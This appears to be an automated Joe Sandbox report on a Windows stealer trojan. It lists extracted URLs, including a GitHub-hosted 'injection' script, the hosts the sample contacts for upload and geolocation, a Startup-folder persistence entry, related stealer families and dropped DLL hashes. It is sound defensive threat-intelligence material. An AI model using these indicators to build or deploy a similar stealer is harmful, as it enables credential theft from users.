http://crl.securetrust.com/SGCA.crlm	HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785675797.000002539B45C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784339813.000002539B459000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B45C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://hotmail.com)z	HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ocsp.accv.es0	HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826197005.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785761530.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783944926.000002539B3F6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784775873.000002539B401000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.python.org/	HyZh4pn0RF.exe, 00000002.00000003.1796799317.000002539A95A000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500341869.000002539A92C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788827650.000002539A948000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A946000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808079169.000002539A95A000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791228515.000002539A94C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809402925.000002539A95C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500185747.000002539A997000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.cert.fnmt.es/dpcs/C7	HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://twitter.com/	HyZh4pn0RF.exe, 00000002.00000003.1796799317.000002539A94D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791344985.0000025399E41000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794230363.0000025399E5C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788452258.0000025399E01000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789039772.0000025399E3B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788827650.000002539A948000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A946000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791228515.000002539A94C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1806888317.000002539A951000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808692623.000002539A952000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1823091900.000002539A952000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790369328.0000025399E40000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://hbo.com)	HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
http://www.quovadisglobal.com/cps	HyZh4pn0RF.exe, 00000002.00000002.1822292872.000002539A719000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A717000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B43B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784091613.000002539B42C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1817908654.000002539A718000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://twitter.com)	HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://geolocation-db.com/jsonp/	HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://google.com/mail/	HyZh4pn0RF.exe, 00000002.00000003.1812678672.000002539A6DB000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://google.com/mail/	HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812368209.000002539A2E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794431278.000002539A2E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809460438.000002539A2E4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794163535.000002539A2D5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authent	HyZh4pn0RF.exe, 00000002.00000002.1825189021.000002539B2E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809054810.000002539B2CE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788652033.000002539B2CE000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://raw.githubusercontent.com/Ayhuuu/injection/main/index.jsyyp	HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://tools.ietf.org/html/rfc5297	HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.136.232	discord.com	United States	13335	CLOUDFLARENETUS	true
45.112.123.126	api.gofile.io	Singapore	16509	AMAZON-02US	false
159.89.102.253	geolocation-db.com	United States	14061	DIGITALOCEAN-ASNUS	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520701
Start date and time:	2024-09-27 18:17:37 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HyZh4pn0RF.exe renamed because original name is a hash value
Original Sample Name:	52c7c34bcc42c907a275f706cde7c03eab24287f3aec081f0bd88780de131e7c.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.winEXE@16/154@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
VT rate limit hit for: HyZh4pn0RF.exe

Simulations

Behavior and APIs

Time	Type	Description
18:18:47	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.136.232	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	discord.com/administrator/index.php
45.112.123.126	HogWarp.exe.bin.exe	Get hash	malicious	Unknown	Browse
	Exela(1).exe	Get hash	malicious	Exela Stealer, Python Stealer	Browse
	WorldWars Setup.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002A_392.exe	Get hash	malicious	NovaSentinel	Browse
	231210-10-Creal-33652f.exe	Get hash	malicious	Creal Stealer	Browse
159.89.102.253	FW PO 20240729TTPI 20240729TT.eml	Get hash	malicious	HTMLPhisher	Browse
	231210-10-Creal-33652f.exe	Get hash	malicious	Creal Stealer	Browse
	GE AEROSPACE USA - WIRE REMITTANCE_.xlsx	Get hash	malicious	HTMLPhisher	Browse
	AWB#803790 .htm	Get hash	malicious	Unknown	Browse
	http://newsletter.haleymarketing.com	Get hash	malicious	Unknown	Browse
	msupdate.exe	Get hash	malicious	Unknown	Browse
	msupdate.exe	Get hash	malicious	Unknown	Browse
	23eb97f4-980c-745d-c5e2-6fdb70189e48.eml	Get hash	malicious	HTMLPhisher	Browse
	http://texadasoftware.com	Get hash	malicious	Unknown	Browse
	KEMPER NORTH AMERICA WIRE REMITTANCE .xlsx	Get hash	malicious	HTMLPhisher	Browse
172.67.74.152	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.gofile.io	HogWarp.exe.bin.exe	Get hash	malicious	Unknown	Browse	45.112.123.126
	VegaX.exe	Get hash	malicious	Unknown	Browse	51.38.43.18
	VegaX.exe	Get hash	malicious	Unknown	Browse	51.38.43.18
	Exela(1).exe	Get hash	malicious	Exela Stealer, Python Stealer	Browse	45.112.123.126
	WorldWars Setup.exe	Get hash	malicious	Unknown	Browse	45.112.123.126
	XarsweLoader.exe	Get hash	malicious	LummaC Stealer	Browse	51.38.43.18
	soinjector.exe	Get hash	malicious	Unknown	Browse	51.38.43.18
	RebelCracked.exe	Get hash	malicious	Exela Stealer, Python Stealer	Browse	51.38.43.18
	Facturation.exe	Get hash	malicious	Doenerium	Browse	104.251.123.67
	Facturation.exe	Get hash	malicious	Doenerium	Browse	51.38.43.18
discord.com	https://bafybeih5zpu7rzaoeodorqhminsbsmv3eswg6px7qixdtiwflfle6cv364.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse	162.159.128.233
	http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse	162.159.137.232
	https://game-repack.site/2024/09/26/bloodborne	Get hash	malicious	Unknown	Browse	162.159.136.232
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	t1RVQb98yT.exe	Get hash	malicious	S400 RAT	Browse	162.159.135.232
	https://bafybeihvxlpwztcsbtbuj36rnn3o3ay7otib4fthnaja4oe34dddvnbfcm.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse	162.159.135.232
	https://mj.ostep.net/acknowledgements	Get hash	malicious	Unknown	Browse	162.159.128.233
	https://bafybeid655cmhe6uwb6wx3qrnokcfyddv63kcnzkm3whfn2xbjyyhukh2m.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse	162.159.136.232
	Exela(1).exe	Get hash	malicious	Exela Stealer, Python Stealer	Browse	162.159.136.232
geolocation-db.com	FW PO 20240729TTPI 20240729TT.eml	Get hash	malicious	HTMLPhisher	Browse	159.89.102.253
	231210-10-Creal-33652f.exe	Get hash	malicious	Creal Stealer	Browse	159.89.102.253
	GE AEROSPACE USA - WIRE REMITTANCE_.xlsx	Get hash	malicious	HTMLPhisher	Browse	159.89.102.253
	AWB#803790 .htm	Get hash	malicious	Unknown	Browse	159.89.102.253
	http://newsletter.haleymarketing.com	Get hash	malicious	Unknown	Browse	159.89.102.253
	msupdate.exe	Get hash	malicious	Unknown	Browse	159.89.102.253
	msupdate.exe	Get hash	malicious	Unknown	Browse	159.89.102.253
	23eb97f4-980c-745d-c5e2-6fdb70189e48.eml	Get hash	malicious	HTMLPhisher	Browse	159.89.102.253
	http://texadasoftware.com	Get hash	malicious	Unknown	Browse	159.89.102.253
	KEMPER NORTH AMERICA WIRE REMITTANCE .xlsx	Get hash	malicious	HTMLPhisher	Browse	159.89.102.253
api.ipify.org	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	SecuriteInfo.com.Trojan.PackedNET.3065.20099.26130.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	file.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	rQuotation3200025006.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	mSLEwIfTGL.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	RTGS-WB-ABS-240730-NEW.lnk	Get hash	malicious	AgentTesla	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIGITALOCEAN-ASNUS	Electronic Receipt for Carolann Campbell.pdf	Get hash	malicious	HTMLPhisher	Browse	138.197.235.123
	file.exe	Get hash	malicious	LummaC	Browse	178.62.201.34
	nBjauMrrmC.exe	Get hash	malicious	FormBook	Browse	167.172.228.26
	https://madresbancolombia.mpache.co/	Get hash	malicious	Unknown	Browse	104.131.25.167
	https://bafybeidqje3fyzla6ot5zhmvxwb5ow3jropcax5pzesf3jh2tqryi6rxma.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse	142.93.100.104
	http://ecometanexus.unids.com/	Get hash	malicious	Unknown	Browse	142.93.100.104
	http://aprackspace.serveusers.com/	Get hash	malicious	Unknown	Browse	157.230.23.237
	http://login-ourtime.members-datings.workers.dev/v3/aboutonlinedating	Get hash	malicious	HTMLPhisher	Browse	138.197.235.123
	https://uhcdenal.com/	Get hash	malicious	Unknown	Browse	206.189.225.178
	https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdf	Get hash	malicious	HTMLPhisher	Browse	165.227.251.217
CLOUDFLARENETUS	http://www.jp-area.com/beppu/rank.cgi?mode=link&id=218&url=https://0oenqK.startprogrammingnowbook.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	104.21.56.213
	https://www.pineapplehospitality.net/	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Blank Grabber	Browse	162.159.133.233
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	https://mercado.defontana.com/loginExterno/IaQsEFxmZUCwWgcKW2iAg	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse	172.67.187.100
AMAZON-02US	https://mercado.defontana.com/loginExterno/IaQsEFxmZUCwWgcKW2iAg	Get hash	malicious	Unknown	Browse	13.32.99.30
	SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msi	Get hash	malicious	AteraAgent	Browse	13.35.58.7
	https://effective-teammates-567500.framer.app/	Get hash	malicious	HTMLPhisher	Browse	108.138.7.90
	ATT71817.docx	Get hash	malicious	HTMLPhisher	Browse	13.227.219.6
	https://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fcasaderestauraciononline.com%2Fholy%2Findexsyn1.html%23cmltYS5hbWV1ckBjYXRhbGluYW1hcmtldGluZy5mcg==	Get hash	malicious	HTMLPhisher	Browse	3.73.242.68
	https://changeofscene.ladesk.com/605425-Secure-Business-Documen	Get hash	malicious	HTMLPhisher	Browse	18.245.60.33
	petronas profile & intro.exe	Get hash	malicious	FormBook	Browse	52.214.234.91
	https://careeligibility.vercel.app/chubedan	Get hash	malicious	HTMLPhisher	Browse	76.76.21.241
	https://sci-hub.tw/	Get hash	malicious	Unknown	Browse	13.32.110.126
	http://specsavers.definition-ai.com	Get hash	malicious	Unknown	Browse	76.76.21.93
CLOUDFLARENETUS	http://www.jp-area.com/beppu/rank.cgi?mode=link&id=218&url=https://0oenqK.startprogrammingnowbook.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	104.21.56.213
	https://www.pineapplehospitality.net/	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Blank Grabber	Browse	162.159.133.233
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	https://mercado.defontana.com/loginExterno/IaQsEFxmZUCwWgcKW2iAg	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse	172.67.187.100

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_Salsa20.pyd	MPX283rT19.exe	Get hash	malicious	Python Stealer, CStealer	Browse
	f2q2w9rTqd.exe	Get hash	malicious	Python Stealer, CStealer	Browse
	LicenseManagerWamp.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.Evo-gen.25168.3752.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.Evo-gen.25168.3752.exe	Get hash	malicious	Unknown	Browse
	PhonexZ.exe	Get hash	malicious	Unknown	Browse
	D07bcK36ed.exe	Get hash	malicious	BLX Stealer, Discord Token Stealer	Browse
	D07bcK36ed.exe	Get hash	malicious	BLX Stealer, Discord Token Stealer	Browse
	ultimateastra.exe	Get hash	malicious	Unknown	Browse
	ultimateastra.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_ARC4.pyd	MPX283rT19.exe	Get hash	malicious	Python Stealer, CStealer	Browse
	f2q2w9rTqd.exe	Get hash	malicious	Python Stealer, CStealer	Browse
	LicenseManagerWamp.exe	Get hash	malicious	Unknown	Browse
	PhonexZ.exe	Get hash	malicious	Unknown	Browse
	D07bcK36ed.exe	Get hash	malicious	BLX Stealer, Discord Token Stealer	Browse
	D07bcK36ed.exe	Get hash	malicious	BLX Stealer, Discord Token Stealer	Browse
	ultimateastra.exe	Get hash	malicious	Unknown	Browse
	ultimateastra.exe	Get hash	malicious	Unknown	Browse
	4wx72yFLka.exe	Get hash	malicious	Python Stealer, CStealer, Chaos	Browse
	0U9NY2PzhK.exe	Get hash	malicious	Python Stealer, CStealer, Chaos	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_ARC4.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.703513333396807
Encrypted:	false
SSDEEP:	96:nDzb9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDV90OcX6gY/7ECFV:Dzz9damqTrpYTst0E5DVPcqgY/79X
MD5:	6176101B7C377A32C01AE3EDB7FD4DE6
SHA1:	5F1CB443F9D677F313BEC07C5241AEAB57502F5E
SHA-256:	EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
SHA-512:	3E7373B71AE0834E96A99595CFEF2E96C0F5230429ADC0B5512F4089D1ED0D7F7F0E32A40584DFB13C41D257712A9C4E9722366F0A21B907798AE79D8CEDCF30
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: MPX283rT19.exe, Detection: malicious, Browse Filename: f2q2w9rTqd.exe, Detection: malicious, Browse Filename: LicenseManagerWamp.exe, Detection: malicious, Browse Filename: PhonexZ.exe, Detection: malicious, Browse Filename: D07bcK36ed.exe, Detection: malicious, Browse Filename: D07bcK36ed.exe, Detection: malicious, Browse Filename: ultimateastra.exe, Detection: malicious, Browse Filename: ultimateastra.exe, Detection: malicious, Browse Filename: 4wx72yFLka.exe, Detection: malicious, Browse Filename: 0U9NY2PzhK.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...b..b..b..R...b..Uc..b.Rc..b..c..b..Ug..b..Uf..b..Ua..b..j..b..b..b....b..`..b.Rich.b.................PE..d....e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_Salsa20.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	4.968452734961967
Encrypted:	false
SSDEEP:	96:JF3TgNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDqbwYH/kcX6gT:WF/1nb2mhQtkXHTeZ87VDqrMcqgYvEp
MD5:	371776A7E26BAEB3F75C93A8364C9AE0
SHA1:	BF60B2177171BA1C6B4351E6178529D4B082BDA9
SHA-256:	15257E96D1CA8480B8CB98F4C79B6E365FE38A1BA9638FC8C9AB7FFEA79C4762
SHA-512:	C23548FBCD1713C4D8348917FF2AB623C404FB0E9566AB93D147C62E06F51E63BDAA347F2D203FE4F046CE49943B38E3E9FA1433F6455C97379F2BC641AE7CE9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: MPX283rT19.exe, Detection: malicious, Browse Filename: f2q2w9rTqd.exe, Detection: malicious, Browse Filename: LicenseManagerWamp.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.25168.3752.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.25168.3752.exe, Detection: malicious, Browse Filename: PhonexZ.exe, Detection: malicious, Browse Filename: D07bcK36ed.exe, Detection: malicious, Browse Filename: D07bcK36ed.exe, Detection: malicious, Browse Filename: ultimateastra.exe, Detection: malicious, Browse Filename: ultimateastra.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......x9..d....`.......P..L............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..L....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_chacha20.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.061461040216793
Encrypted:	false
SSDEEP:	192:ldF/1nb2mhQtkXn0t/WS60YYDEiqvdvGyv9lkVcqgYvEMo:v2f6XSZ6XYD6vdvGyv9MgYvEMo
MD5:	CB5238E2D4149636377F9A1E2AF6DC57
SHA1:	038253BABC9E652BA4A20116886209E2BCCF35AC
SHA-256:	A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
SHA-512:	B1E6AB509CF1E5ECC6A60455D6900A76514F8DF43F3ABC3B8D36AF59A3DF8A868B489ED0B145D0D799AAC8672CBF5827C503F383D3F38069ABF6056ECCD87B21
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_pkcs1_decode.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.236167046748013
Encrypted:	false
SSDEEP:	192:/siHXqpoUol3xZhRyQX5lDnRDFYav+tcqgRvE:h6D+XBDgDgRvE
MD5:	D9E7218460AEE693BEA07DA7C2B40177
SHA1:	9264D749748D8C98D35B27BEFE6247DA23FF103D
SHA-256:	38E423D3BCC32EE6730941B19B7D5D8872C0D30D3DD8F9AAE1442CB052C599AD
SHA-512:	DDB579E2DEA9D266254C0D9E23038274D9AE33F0756419FD53EC6DC1A27D1540828EE8F4AD421A5CFFD9B805F1A68F26E70BDC1BAB69834E8ACD6D7BB7BDB0DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...........R......U.....R............U......U......U................}.........Rich...........................PE..d....e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..\|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..\|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aes.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	6.558176937399355
Encrypted:	false
